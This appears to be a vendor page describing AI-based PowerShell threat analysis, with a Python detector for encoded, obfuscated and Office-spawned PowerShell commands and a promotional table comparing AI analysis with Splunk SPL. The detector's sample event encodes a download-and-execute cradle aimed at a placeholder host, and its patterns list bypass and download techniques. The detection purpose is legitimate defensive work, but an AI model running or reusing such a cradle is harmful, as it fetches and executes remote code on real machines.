PowerShell Analysis
Monitors and analyzes PowerShell execution patterns to detect malicious activity, privilege escalation attempts, and suspicious command execution that may indicate compromise.
Fluency's AI analyzes PowerShell execution events to identify suspicious patterns, obfuscated commands, and potential privilege escalation attempts. The system examines command syntax, execution context, and historical patterns to distinguish between legitimate administrative tasks and malicious activity.
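As an added illustration (not Fluency's code), the following Python scores constructed PowerShell process-creation events on the dimensions the paragraph names: command syntax (obfuscation indicators, including the decoded `-EncodedCommand` payload) and execution context (the parent process). The indicator names, the sample events and the `example.invalid` host are assumptions.

```python
"""Score PowerShell process-creation events for obfuscation and suspicious
execution context. Added example, not Fluency's code; events are constructed."""
import base64
import re

# Command-line indicators a SOC analyst checks first (case-insensitive).
INDICATORS = {
    "encoded_command": re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(r"downloadstring|invoke-webrequest|net\.webclient", re.I),
    "backtick_obfuscation": re.compile(r"\w`\w"),   # e.g. I`E`X
    "string_concat": re.compile(r"'\s*\+\s*'"),     # e.g. 'Down'+'load'
}
OFFICE_PARENTS = ("winword.exe", "excel.exe", "outlook.exe")

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = re.search(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(event):
    """Return (score, hits): indicator names found in the raw command line, in the
    decoded payload (prefixed 'decoded:'), and in the execution context."""
    cmdline = event["CommandLine"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits += ["decoded:" + name for name, rx in INDICATORS.items()
                 if name != "encoded_command" and rx.search(decoded)]
    # Execution context: PowerShell launched by an Office process is rarely admin work.
    if event.get("ParentImage", "").lower().endswith(OFFICE_PARENTS):
        hits.append("office_parent")
    return len(hits), hits

# Constructed sample events: a routine admin task and an Office-spawned encoded download cradle.
_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16-le")
).decode("ascii")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "CommandLine": f"powershell.exe -w hidden -ep bypass -enc {_PAYLOAD}"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze_event(ev))
```

The raw command line of the second event shows only the base64 blob, so the download cradle is visible only after decoding; that is why the decoded payload is scored separately.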
AI Analysis vs Splunk SPL-Based Detection
See how advanced AI-driven security analysis compares to traditional SPL-based detection in key areas of context, logic, and output quality.
| Feature / Capability | AI Analysis | Splunk SPL-Based Detection |
|---|---|---|
| IP to location logic | Accurate with human-readable locations (Barcelona → Opfikon) and real-world travel distance | Based on iplocation, sometimes inaccurate or outdated; no city-to-city distance context |
| Device context awareness | The AI recognizes that the second IP belongs to a known AVD endpoint and distinguishes a cloud-hosted device from a personal one | SPL treats IPs as flat values; it doesn’t infer context from device names unless that context is explicitly encoded in a lookup |
| User role logic | Knows the user is a subcontractor marked ONLY REMOTE, so a virtual desktop infrastructure login is expected | SPL cannot infer or evaluate user roles without joining external HR or identity data |
| Session analysis | The AI considers whether logins belong to the same session or to different contexts (VDI vs. local) | SPL can’t link session context unless it is engineered manually (e.g., through token IDs or session IDs) |
| False positive suppression logic | Advises suppression based on trusted IP/device combinations, remote work patterns, and device type | Requires custom correlation searches, lookups, or external context ingestion |
| ML signal interpretation | Explains why the alert triggered (ML_NEW_USER, ML_NEW_GEO_ISP) and de-risks it based on identity validation | SPL will just flag those risks; human/AI interpretation must be layered on top |
| Analyst judgment | Emulates how a human SOC analyst would reason through intent, identity, and environment | SPL doesn’t support nuanced intent modeling without external logic or ML/UEBA tooling |
| Output quality | Clear, contextual, explainable narrative with defensive recommendations | SPL produces tabular alerts and risk scores; lacks explanation without additional dashboards or notes |